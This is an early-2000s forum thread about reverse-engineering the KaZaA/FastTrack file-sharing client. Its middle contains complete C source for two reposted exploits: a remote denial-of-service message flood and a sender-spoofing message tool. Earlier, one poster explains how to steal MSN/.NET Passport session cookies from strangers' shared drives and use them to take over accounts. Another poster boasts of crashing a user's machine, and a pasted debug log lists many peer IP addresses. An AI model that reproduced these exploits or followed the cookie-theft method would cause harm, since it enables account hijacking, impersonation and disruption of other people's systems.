This does not belong anywhere else...so...

[butterfly_kisses]

Quote:

One girl did a site where she included everything she came up with, and a connection a comapny has in using KaZaA to mine personal info

i don't suppose you'd have a link for us to that would you?

p.s.

expect some breaking news tomorrow.

/\/\/\/\/\/\//////////////////\/\/\/\///////////////////////\/\/\/\/\/\/\\//////////
"...when news breaks we fix it!"
\/\/\/\/\/\/\\\\\\\\\\\\\\\\\/\/\/\/\\\\\\\\\\\\\\\\\\\\\\\/\/\/\/\/\/\/\\\\\\\\\\\\

[butterfly_kisses]

Scyth, I loved your unpacker program for the kmd.exe. I've never seen anything like it anywhere else before. Now my question is this:

Can it be modified to also unpack the kazaa.exe (version 1.61) and if so how?

Thanks,

re: Supercookie and Ethen

Whoops, what i meant here ethen was an article posted by Napho about stealing your cookies when you are logged into MSN that was what I meant by "supercookie"

sorry that i was unclear there. my apologies.

[Mowzer]

Re: Super cookies.

That msn cookie hole, isnt a super cookie. Due to the fact it is vunerable by stealing any msn cookies, that show a session where the user has failed to activily click on log out.

Once you have the cookie you get full acess, to thier msn services or .net passport.

Even if the person changes thier passwords you can still gain acess as long as you have thier cookies.

The easy way? type in the name of the cookie in KaZaA, and you will get a list from those sharing thier whole hard drive. Then grab cookies at will.

Much easier then sorting through complete lists for one cookie.

But really why would you want acess to some ones .net services any ways? You can read there hotmail emails and all the spam that has piled up.

seesh. As I mentioned others have found far more intresting ways to get acess to entire drives, that seem to yeild allot more shocking details.

And if KaZaA isnt enough there are a thousand other exploits, torjans, etc.

The list is really endless.

"Man who fight with wife all day get no peice at night."

[butterfly_kisses]

Quote:

But really why would you want acess to some ones .net services any ways? You can read there hotmail emails and all the spam that has piled up.

ethen, i think you kind of missed the point of the tutorial. The intention I had was to show that kazaa associates ip addresses with usernames.

that was the point.

The other reasons I listed were for Jack's benefit to show him some potential uses for this technique.

Another use? collecting ip addresses (after interpreting their results from the kazaadebug.log) and funneling the results into getright as "mirrors" to use them later for segmented downloading (this was the 5th use)

The first use I referred to is good for "tracking your enemies"

ask your friend is she's ever gone by the name

darkvixenbitch@KaZaA and let me know what she says.

Peace.

[Scyth]

Quote:

Originally posted by Harbynger
Can it be modified to also unpack the kazaa.exe (version 1.61) and if so how?

It can, by changing a few constants. I'll get around to doing that sometime this weekend.

[butterfly_kisses]

cool, thanks, Scyth

btw "teach a man to fish you feed him for a lifetime"

I'm very happy to have found someone so talented that can do (what up til now seemed almost impossible at least it was that way for me). I hope/wish that you would make a tutorial on how this possible and what type of protection scheme they (kazaa) are using and exactly how it is that you've come to defeat it. that would be cool.

However, I am and will be happy with just a simple (but magnificient) program with which i can double-click to do the dirty work for me.

thanks, again

Cheers,

-harby

[butterfly_kisses]

Here is some interesting reading taken from:

www.securiteam.com

Quote:

Title 27/2/2002
Kazaa, Grokster and Morpheus Remote Denial of Service


Summary
Kazaa, Grokster, and Morpheus suffer from a remote denial of service vulnerability. Furthermore, the vulnerability also allows identity hijacking, allowing an attacker to send a message to the target faking someone else's name.


Details
Vulnerable systems:
Kazaa, Grokster, and Morpheus clients for Windows version 1.3.3

Immune systems:
Kazaa, Grokster, and Morpheus clients for Windows version 1.5

There is a remote denial of service in fasttrack person-to-person technology, used by Kazaa, Grokster, and Morpheus that can allow an attacker to crash the program and in certain cases hang the machine.

In the same service, identity can be faked by a malicious attacker to involve remote user in desired operations.

Solution:
The vendor has released a new version that is not vulnerable to the mentioned vulnerability.

Exploit code (DoS):
/* kazaa-xploit.c code
*
* Filename : kazaa-xploit.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
* Date : 9/2/2K2
* Abstract : Send X messages to any kazaa, grokster and morpheus client
* version 1.3.3 for windows exhausting the system.
*
* Compile: #gcc -o kazaa-xploit kazaa-exploit.c
* Usage: #./kazaa-xploit host/ip nmessages
* Example: #./kazaa-xploit 192.168.0.5 1000
*
* This will send 1000 messages to given kazaa client.
* proof of concept for the same advisorie. Source code
* extracted from kazaa-msg.c program written by mrjade, for
* sending readable messages to any kazaa user.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrjade@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* NOTES:
* Improves of this code can generate diferent id@domain names for
* each connection.
*
* For 300mb of RAM 1000 messages will be a good example.
*/

/* ---== Include section ==--- */

#include <netdb.h>
#include <arpa/inet.h>

#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */

/* ---== Defines section ==--- */

/* kazaa-head id, dominio, to */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: aaa\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "user" /* Default id for sending msg */
#define minetwork "domain.com" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */

/* ---== Procedure section ==--- */

/* Usage Banner..*/
void usage(char *pname) {
printf (" :: Usage : %s ip/host n_messages\n", pname);
printf (" :: 1000 for 300mb of RAM aprox.\n", pname);
fflush (stdout);
exit(-1);
}

/* Resolv hostname */

unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

if((addr.s_addr = inet_addr(host)) == -1) {
printf(" :: Resolving host: %s\n", host);
if(!(host_ent = gethostbyname(host))) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
} return(addr.s_addr);
}


char *get_token (char *buffer, char *token){
char *stri, *strf;

if ((stri = strstr (buffer, token))){
stri = stri + strlen(token);
strf = strchr (stri, 0xA);
strf[-1]= 0;
} else {
return (NULL);
}
return (stri);
}

/* ---== MAIN Procedure ==--- */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id; /* user_name = id = remote user name */
char *user_net, *network; /* user_net = network = remote user network */
char buffer[512]; /* Rec. buffer*/
int a=0;

printf("\n :: xploit code for kazaa, morpheus and grokster users..");
printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");

if( argc < 3) {
usage( argv[0] );
}

/* Host resolv and connect */
host = argv[1];
TheHoSt.sin_family = AF_INET;
TheHoSt.sin_addr.s_addr = resol(host);
if(!TheHoSt.sin_addr.s_addr) {
printf(" :: ERROR: host not found.\n\n");
exit(-1);
}

/* We must get remote user name, need it to send any request */
TheHoSt.sin_port = htons(PORT);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

printf(" ::\n :: Getting username@network: "); fflush(stdout);

/* Search for username@userdomiain on host */
send(sock,http_basic,strlen(http_basic),0);
recv(sock,buffer,sizeof(buffer),0);
close(sock);

if ((user_net = get_token(buffer, "Network: ")) && \
(user_name = get_token(buffer, "Username: "))){
printf ("%s@%s\n", user_name, user_net);
fflush (stdout);
} else {
printf ("ERR\n :: No username or network detected\n\n");
fflush (stdout);
exit (-1);
}

/* Storing strings */
network = malloc (strlen(user_net)+1);
bzero (network, strlen(user_net)+1);
memcpy (network, user_net, strlen(user_net));

id = malloc (strlen(user_name)+1);
bzero (id, strlen(user_name)+1);
memcpy (id, user_name, strlen(user_name));
} else {
printf(" :: ERR Can't connect.\n\n");
fflush(stdout);
exit (-1);
}

/* number of msg to send*/
cont = strtol (argv[argc-1],0,10);
if (cont < 1){
cont= 1000;
}
printf(" :: Sending %d messages:\n", cont);
fflush(stdout);


/* create HTTP request */
c_ = strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+ 3;
btmp = malloc( c_);
bzero(btmp, c_);
sprintf (btmp, kazaa_head, id_, minetwork, id);



/* Bucle */
for (a=0; a < cont; a++){

/* Now send the message request */
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}

printf(".");fflush(stdout);
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
send(sock,btmp,strlen(btmp),0);
recv(sock,buffer,sizeof(buffer),0);
if (strstr(buffer, "200")){ // HTTP OK
printf(".");fflush(stdout);
} else {
printf("\n :: Can't deliver message. \n\n");fflush(stdout);
close(sock);
exit(-1);
}
bzero(buffer,sizeof(buffer)); //Clear Buffer
} else {
close(sock);
printf("\n :: Can't connect. Service down \n\n");
exit(-1);
}
close (sock);
} /* for */
return (0);
}


Exploit code (Message spoofing):
/* kazaa-msg.c code
*
* Filename : kazaa-msg.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
* Date : 9/2/2K2
* Abstract : Send a message to any kazaa, grokster and morpheus user,
* knowing their ip/hostname. Programmed for hackindex team.
* http://www.hackindex.com
*
* Compile: #gcc -o kazaa-msg kazaa-msg.c
*
* Usage: #./kazaa-msg host/ip message
*
* Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
*
* This will send a message to given kazaa user (host). Actually this is
* just a proof of concept. requiered fields for send a message are:
*
* X-Kazaa-Username
* X-Kazaa-Network
*
* These will form the "FROM" : name@network
* modify the id_ and minetwork defines to change "FROM" field.
*
* X-Kazaa-IMTo "TO" field. Remote kazaa's login
* (kazaa, grokster, morpheus)
* It's retrieved from a first connection to
* host.
* X-Kazaa-IMType user_text Type of data (fixed)
* X-Kazaa-IMData Message radix64 encoded.
*
* For grokster (tested) and morpheus (not tested) the name of the fields
* in the HTTP header are the same.
*
* If you want to receive any answer from the remote user, you must open
* a tcp socket listening on port 1214. HTTP header will be the same, and
* message must be decoded using Radix64 algorithm.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrjade@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*
* Other Copyright:
*
* radix64 encode table and enc64() by Carl M. Ellison *
*
* NOTES:
* Not tested at all.. it my be bugged.
*/

/* ---== Include section ==--- */

#include <netdb.h>
#include <arpa/inet.h>

#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */

/* ---== Defines section ==--- */

/* kazaa-head id, dominio, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"

#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "admin" /* Default id for sending msg */
#define minetwork "hackindex" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */

/* ---== Global variables ==--- */


char enctab[64] = { /* radix64 encoding table */
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O', 'P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e', 'f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u', 'v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+', '/'
};

/* ---== Procedure section ==--- */

/* Usage Banner..*/
void usage(char *pname) {
printf (" :: Usage : %s ip/host mensaje\n", pname);
fflush (stdout);
exit(-1);
}

/* Resolv hostname */
unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;

if((addr.s_addr = inet_addr(host)) == -1) {
printf(" :: Resolving host: %s\n", host);
if(!(host_ent = gethostbyname(host))) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
} return(addr.s_addr);
}


char *get_token (char *buffer, char *token){
char *stri, *strf;

if ((stri = strstr (buffer, token))){
stri = stri + strlen(token);
strf = strchr (stri, 0xA);
strf[-1]= 0;
} else {
return (NULL);
}
return (stri);
}


void enc64( outbuff, out_lth, polth, inbuff, inb_lth, line_lth, n_space )
char *outbuff ; /* output buffer */
long out_lth ; /* allocated length of the output buffer */
long *polth ; /* actual length of output */
unsigned char *inbuff ; /* input (binary) buffer */
long inb_lth ; /* length of inbuff */
long line_lth ; /* maximum line lth (-1 means infinite) */
long n_space ; /* # spaces at start of each text line */
{
long nl ; /* # chars left in this line */
char *b, *c ; /* walking pointers */

nl = line_lth ;
b = inbuff ;
c = outbuff ;

while ( (inb_lth > 0)
&&(out_lth > 5) ) {
/* encoding */
c[0]=enctab[(b[0]>>2)&0x3f] ;
c[1]=enctab[((b[0]&0x3)<<4)|((b[1]>>4)&0xf)] ;
c[2]=enctab[((b[1]&0xf)<<2)|((b[2]>>6)&0x3)] ;
c[3]=enctab[b[2]&0x3f] ;
out_lth -= 4 ; /* count the code bytes */
switch (inb_lth) { /* take care of the final bytes */
case 1: c[2]='=' ; /* only 1, so == */
case 2: c[3]='=' ; /* 2, so = */
inb_lth = 0 ; /* either way, we're done */
c += 4 ; /* but no spaces */
*(c++) = '\n' ; /* and there's an end of line */
break ;

default:
inb_lth -= 3;
b += 3 ;
c += 4 ;
nl -= 4 ;
if (nl <= 0) {
long i ;
*(c++) = '\n' ;
nl = line_lth ;
for (i=0;i<n_space;i++)
*(c++) = ' ' ;
out_lth -= 1 + n_space ;
}
break ;
} /* switch */
} /* while */
*polth = c - outbuff ;
} /* enc64 */

/* ---== MAIN Procedure ==--- */

int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id; /* user_name = id = remote user name */
char *user_net, *network; /* user_net = network = remote user network */
char *msg, *msgr64; /* Radix 64 stuf */
long olth; /* Radix 64 stuf */
char buffer[512]; /* Rec. buffer*/

printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");

if( argc < 3) {
usage( argv[0] );
}

/* Host resolv and connect */
host = argv[1];
TheHoSt.sin_family = AF_INET;
TheHoSt.sin_addr.s_addr = resol(host);
if(!TheHoSt.sin_addr.s_addr) {
printf(" :: ERROR: host not found.\n\n");
exit(-1);
}

/* We must get remote user name, need it to send any request */
TheHoSt.sin_port = htons(PORT);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

printf(" ::\n :: Getting username@network: "); fflush(stdout);

/* Search for username@userdomiain on host */
send(sock,http_basic,strlen(http_basic),0);
recv(sock,buffer,sizeof(buffer),0);
close(sock);

if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))){
printf ("%s@%s\n", user_name, user_net); fflush (stdout);
} else {
printf ("ERR\n :: No username or network detected\n\n"); fflush (stdout);
exit (-1);
}

/* Storing strings */
network = malloc (strlen(user_net)+1);
bzero (network, strlen(user_net)+1);
memcpy (network, user_net, strlen(user_net));

id = malloc (strlen(user_name)+1);
bzero (id, strlen(user_name)+1);
memcpy (id, user_name, strlen(user_name));
} else {
printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
exit (-1);
}


/* Now send the message request */
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {

printf(" :: Sending message to %s from %s@%s\n", id, id_, minetwork);fflush(stdout);

/* Get msg length */
cont=2; c_=0;
while (cont < argc){
c_ = c_ + strlen(argv[cont++])+1;
}

/* Allocate buffer */
msg = malloc (c_);
bzero (msg, c_);

/* Store msg in buffer */
cont=2;
while (cont < argc){
strcat(msg,argv[cont]);
strcat(msg, " ");
cont++;
}
msg[strlen(msg)]=0;

/* Output buffer for radix64 conv */
msgr64 = malloc (2*c_);
bzero (msgr64, 2*c_);

/* Convert msg to radix 64 */
enc64( msgr64, 2*c_, &olth, msg, c_, 9999, 0 );

/* Store in buffer */
c_ = strlen (msgr64)+strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(mi network)+3;
btmp = malloc(c_);
bzero(btmp, c_);
sprintf (btmp, kazaa_head, id_, minetwork, id, msgr64);
send(sock,btmp,strlen(btmp),0);
while ((recv(sock,buffer,sizeof(buffer),0)!=-1) && (buffer[0] !=0)){
if (strstr(buffer, "200")){ // HTTP OK
printf(" :: Message sent.\n\n");
close(sock);
exit(0);
}
bzero(buffer,sizeof(buffer)); //Clear Buffer
}

printf(" :: Can't deliver message\n\n\n\n");
} else {
close(sock);
printf(" :: Can't connect. Service unavailable.\n\n");
exit(-1);
}
close(sock); //Remote host will close it when finished
return (-1);
}


Additional information
The information has been provided by mrjade 2k2.

please note that the reasons these program's codes were posted is to help developer's like AYB and Indy (Scyth too) who may actually be interested in making something useful not destructive.

Usually the innovations we seek are most times to found in through their misuse. These programs and their code exist freely on the internet are believed to be a part of public domain

[Mowzer]

Tim,

Nope she said she never has used that name. She doesnt really use kazaa much. She's a linux babe and says the kazaa linux deal fast track put out was shit.

Anyway, she isnt my friend either, just some chick who found out something was going on and wrote about it, along with examples.

Her orignal site seems to be 404 now. I guess when you put up peoples private things they get made.

<rant>
anyway. I will tell you whats a real piss off. These people that are tight wads, about sharing files.

Some nut cut me off on a movie, and the sent a nasty note. I sent him back a blue screen.

People need to realize some of us collect mass ammounts of movies but often when they pile up burn them to cd and start collecting a new. There fore untill we get another new download there is nothing to share.

grr that irks me.
</rant>

[butterfly_kisses]

Hi all here is some updated information from "stucky" concerning the newer version of kazaa protocol...sadly his site is no longer online (dam sharman) but the google cache still remains for a limited time check it out here:

http://216.239.33.100/search?q=cache...ml+kazaa&hl=en

re: ethen, sorry her site is gone. thanks for posting. lol about the rant...i know the feeling

re: and update on the current situation

a)we have an unpacked version of the kmd.exe (version 1.61 installer for the kazaa media desktop) -thanks to Scyth

b)we have sig2dat by Indy which allows you to make file hashes and store them as dat files


more on this:

Indy do you think you could possibly work with this a little more and have it "hash" all you files the way the kazaa program does?

i was just thinking that between you and AYB and me and a few othes (some whom haven't been named for various reasons) we almost got enough to make our fasttrack client WITHOUT fasttrack only implementing some of its core technologies.

Basically the threatening email you got (yeah it was from sharman) was due to the fact that you were so close on the money with you sig2dat program it basically does the same thing kazaa does....

kazaa makes a hash listing of your files that you want shared and stores them in the form of the dbb files...btw i have more info on how this is done. i will share it with you (i've got it burned on one of a hundred plus cd-r dics

c)AYB has the automatically search for more sources program (morpheusX) encorporating these two into a client would be great


d)I've nearly got the encryption figured out and will be posting more on it soon along with some vbscript code for how to do the formula's to translate the "encrpted" ip addresses that kazaa keeps track of now

I wanted there to be more good news....sorry that there isn't more then what has been said (publicly) not that there is any great "secret" going on in private (i can't help but wink when i say that ..haha)

what i need now is this

a)Anybody who is willing to function as a supernode for the KaZaA or kazaa/lite grokster client that would be willing to shared the file indexes that are stored on your computer (where the client indexes the files that others are sharing ) i need some of these logs for studying. please can you help me out by emailing me some of these file indexes that are "supposedly" stored on your pc when it functions as a supernode (i've never personally seen it or this phenomena of course i'm on dial-up now so i can't function as a supernode and when i did have cable i lacked the knowledge and desire that i possess now to solve this mystery and remove spyware for real with the help of friends and fellow privacy advocates as well as the programmer's /hackers/crackers and other united cd-burner's out there in our "brain-to-brain" network

update on Project KaZaM

Project KaZaM (similiar to the Metamorphesis project) has been dealt a crushing blow by being locked out of the network by new encryption in kazaa media desktop 1.61

Sadly, this problem will worsen and users should expect the release of a new version of kazaa very soon before the end of the month is up....the new version is 1.7 and this is unconfirmed speculation on my part so don't bother looking for verification from other sources...

on a personal note.....

i really hate the direction that sharman networks is moving KaZaA into...very shortly they will destroy the network by cutting off Grokster and making mandatory the Altnet software much the same way that the cd_clint.dll file is now required. [again this is my personal opinion and gut instinct on where they are heading in this direction]

Soon there may be no alternatives or options in a fasttrack client.
Sure there are other p2p programs but none match the reliability of the fasttrack network or its userfriendliness and huge userbase.

The dawning of new Napster....yes its soon to be the end for KaZaA.

[butterfly_kisses]

KaZaA users do you notice anything strange??? what happened to the username@??? that we used to see when the Morpheus registration servers went down?

Well until now, KaZaA and Grokster was centralized but now I have found a way to break free from the registration servers once again...i am working on getting this out to you as soon as possible...

here is a truly free p2p fasttrack client (modified by me) with LOTs of help from fellow nettizens and napsterites.

This client bypasses the login/registration servers please note my username in the pic.

This is a modified version of the 1.4 client we were talking about in another thread...well the reality of what was suggested appears to be here...NOW



btw Scyth I could really use that unpacking tool for the kazaa.exe if you have it ready...i can only do so much with the compressed executable...thanks-in-advance.

-Harbynger

edited to decrease the font-size...it was annoying

[prggr]

Quote:

Originally posted by Harbynger
Well until now, KaZaA and Grokster was centralized but now I have found a way to break free from the registration servers once again...i am working on getting this out to you as soon as possible...

This client bypasses the login/registration servers please note my username in the pic.

Uhh.. you do realize that the latest Fasttrack clients do not have a central registration server, right? They dumped that several versions ago-- probably to help with the lawsuit.

The name after the @ (whatever@???) is not from your client contacting a main server somewhere...

[butterfly_kisses]

Quote:

The name after the @ (whatever@???) is not from your client contacting a main server somewhere...

sorry, prggr
i gotta disagree with you there and i have evidence to back up my claims see this screenshot below:

these broadcast control nodes are loaded into your network config file (in the registry) and this how some clients (particuliarly older ones) are given the error message "too old to connect" etcetera, etcetera

[prggr]

Quote:

Originally posted by Harbynger


sorry, prggr
i gotta disagree with you there and i have evidence to back up my claims see this screenshot below:

these broadcast control nodes are loaded into your network config file (in the registry) and this how some clients (particuliarly older ones) are given the error message "too old to connect" etcetera, etcetera

Yes, but those nodes are not large databases housing usernames. Try creating a username of asdf. Notice it doesn't complain.. I'm sure someone's used an username of asdf at somepoint (I know I do.) Don't confuse version checking with something else.

[butterfly_kisses]

Quote:

Don't confuse version checking with something else.

i don't think that i am. Please check in HKLM\Software\KaZaA and Network config and you will see reference to MusicCity Musiccity has been off the fasttrack map for quite some time now hasn't it?

doesn't that make you wonder why there is this reference to MusicCity inside your registry?

It to me means that "kazaa" or whomever controls these supernodes through manipulation of the data that gets sent to the other clients is imposing a filter for the Morpheus client e.g., "musiccity" so if a Filter can be put in place for MusicCity to keep Morpheus from connecting to the fasttrack network why not a filter to prevent the downloading of any unauthorised content over the network.

This to me suggests control and true its not the part in front of the @ symbol that matters but what follows usually you will only see @fileshare /@Grokster or @KaZaA

The part that comes after the @ symbol is verified by a control mechanism such as a supernode whether or not KaZaA or FAstTrack-BV owns or controls a particuliar node could be significant and is not necessarily irrelevant but the main evidence or indicator here is that there is a mechanism for control and filtering regardless of whether its centralised (which i would suggest it is) or not....it is possible to deny access to the network based on certain Criteria such as a username with the extension of @MusicCity otherwise why would this entry be present in your registry?

[butterfly_kisses]

i thought some of you might find this interesting...using the reg files given to me by an anonymous source and through my own tweaks i was able to connect with a non cydoor version of kazAA actually version 1.2

Here is a screenshot..please note that I'm the only user online and that while i can search for files none are displayed (no results are returned)

is this just an anonmally? or does this mean if KaZaA goes pay or shuts down we can start using older versions to connect again?
i honesly don't know what it means so you decide for yourselves:


The pic:

[butterfly_kisses]

Logging started (YODAYADACOM1911) 18-05-2002 21:09:18
kazaa: new Kazaa_connection_info set (200 hosts)
kazaa: listening on TCP port 1214
kazaa: node state 3-->1
KazaaServerConnector: Status 0->1 (-1 0 0)
SpeedDetector: RAS: 2000 modem (Actiontec 56K PCI Call Waiting Modem)
SpeedDetector: Starting trace to 204.152.21.15
SpeedDetector: Starting trace to 130.244.105.107
SpeedDetector: Starting trace to 202.139.219.145
SpeedDetector: Starting trace to 202.232.145.21
LocalContentManager: New file download10216888702448832.dat
TraceRoute: Hop 1 67.240.2.137, status 11013 time: 125.831
TraceRoute: Hop 2 failed (0:11010) 1207.27
TraceRoute: Hop 3 failed (0:11010) 1499.68
TraceRoute: Hop 4 failed (0:11010) 1499.68
TraceRoute: Hop 2 152.63.40.110, status 11013 time: 128.383
TraceRoute: Hop 3 152.63.36.38, status 11013 time: 114.837
TraceRoute: Hop 4 152.63.33.14, status 11013 time: 126.801
TraceRoute: Hop 1 67.240.2.137, status 11013 time: 105.357
Video: test.avi 352x288 Len: 3567 Rate: 183 mp43
LocalContentManager: New file test.avi
LocalContentManager: New file desktop.ini
LocalContentManager: Hashing file download10216888702448832.dat
TraceRoute: Hop 3 failed (0:11010) 1488.36
TraceRoute: Hop 4 failed (0:11010) 1499.64
TraceRoute: Hop 1 67.240.2.141, status 11013 time: 101.367
TraceRoute: Hop 2 failed (0:11010) 1398.21
Socket: Address/gethostbyname error 11001
TraceRoute: Hop 4 152.63.33.38, status 11013 time: 131.917
TraceRoute: Hop 1 67.240.2.141, status 11013 time: 105.254
TraceRoute: Hop 2 152.63.40.110, status 11013 time: 140.456
TraceRoute: Hop 3 152.63.36.50, status 11013 time: 109.701
KazaaServerConnector: Status 1->5 (1 0 0)
kazaa: node state 1-->2
SpeedDetector: Trace completed, common hop 1, ave time 109.452
TraceRoute: Hop 1 67.240.2.137, status 0 time: 190.492
TraceRoute: Hop 1 67.240.2.137, status 0 time: 204.04
TraceRoute: Hop 1 67.240.2.137, status 0 time: 168.938
SpeedDetector: Pinging completed, recd: 3 ave time: 187.823 bps: 5089.89
kazaa: node state 2-->3
client_connector_t: connecting to 12.253.116.164:1214 (1 in progress)
client_connector_t: connecting to 66.27.9.150:1214 (2 in progress)
client_connector_t: connecting to 24.201.7.218:1214 (3 in progress)
client_connector_t: connecting to 24.157.252.174:1214 (4 in progress)
client_connector_t: connecting to 24.29.103.109:1214 (5 in progress)
LocalContentManager: Hashing file test.avi
Socket: Address/gethostbyname error 11001
LocalContentManager: Hashing file desktop.ini
LocalContentManager: Scan completed
LocalContentManager: Sharing: deleted 0, added 17 files
client_connector_t: connecting to 12.251.170.197:1214 (6 in progress)
client_connector_t: connecting to 66.1.200.12:1214 (7 in progress)
client_connector_t: connecting to 24.30.187.59:1214 (8 in progress)
client_connector_t: connecting to 24.51.135.80:1214 (9 in progress)
client_connector_t: connecting to 68.68.56.55:1214 (10 in progress)
client_connector_t: connecting to 66.176.218.149:1214 (11 in progress)
client_connector_t: connecting to 12.254.133.83:1214 (12 in progress)
client_connector_t: connecting to 12.238.89.57:1214 (13 in progress)
client_connector_t: connecting to 65.26.127.67:1214 (14 in progress)
client_connector_t: connecting to 12.221.129.38:1214 (15 in progress)
client_connector_t: connecting to 66.67.95.181:1214 (16 in progress)
client_connector_t: connecting to 24.49.224.5:1214 (17 in progress)
client_connector_t: connecting to 12.221.98.140:1214 (18 in progress)
client_connector_t: connecting to 66.130.102.76:1214 (19 in progress)
client_connection_t: 12.253.116.164:1214 timeout, 10034 ms
client_connection_t: 66.27.9.150:1214 timeout, 10179 ms
client_connection_t: 24.201.7.218:1214 timeout, 10179 ms
client_connection_t: 24.157.252.174:1214 timeout, 10178 ms
client_connection_t: 24.29.103.109:1214 timeout, 10177 ms
client_connector_t: connecting to 12.216.228.149:1214 (20 in progress)
client_connector_t: connecting to 24.198.108.118:1214 (16 in progress)
client_connector_t: connecting to 24.161.76.192:1214 (17 in progress)
client_connector_t: connecting to 68.6.191.98:1214 (18 in progress)
client_connector_t: connecting to 24.31.246.65:1214 (19 in progress)
client_connector_t: connecting to 24.198.87.251:1214 (20 in progress)
client_connector_t: connecting to 68.51.149.86:1214 (21 in progress)
client_connector_t: connecting to 24.150.89.163:1214 (22 in progress)
client_connector_t: connecting to 68.97.6.105:1214 (23 in progress)
client_connector_t: connecting to 24.159.252.142:1214 (24 in progress)
kazaa: local IP address detected as 67.240.8.77
kazaa: connected
kazaa: connected
kazaa: connected
kazaa: connected
client_connector_t: connecting to 65.26.52.183:1214 (25 in progress)
client_connector_t: connecting to 68.33.117.254:1214 (26 in progress)
kazaa: connected
client_connection_t: 12.251.170.197:1214 timeout, 10029 ms
client_connector_t: connecting to 68.44.209.189:1214 (26 in progress)
kazaa: connected
client: packet 0 received, len 1600
kazaa: 197 dead hosts thrown out of Kazaa_connection_info
kazaa: new Kazaa_connection_info set (200 hosts)
client_connection_t: 66.67.95.181:1214 not-accepted, 5179 ms
client_connector_t: connecting to 66.76.179.231:1214 (26 in progress)
client: packet 0 received, len 1600
kazaa: 3 dead hosts thrown out of Kazaa_connection_info
kazaa: new Kazaa_connection_info set (200 hosts)
client: packet 35 received, len 4
client: packet 38 received, len 4
client: packet 29 received, len 5
client_connection_t: sent our network name to supernode
client: packet 3 received, len 0
client: packet 9 received, len 60
client: packet 30 received, len 4
client_connector_t: done, 12.221.129.38:1214, 13415 ms
LocalContentManager: ResetNetworkFiles
LocalContentManager: Sharing: deleted 0, added 17 files
LocalContentManager: Scan completed
client: packet 21 received, len 10
kazaa: starting firewall test to 172.183.180.230:1214
kazaa: firewall test to 172.183.180.230:1214 completed, result 1
client: packet 8 received, len 2
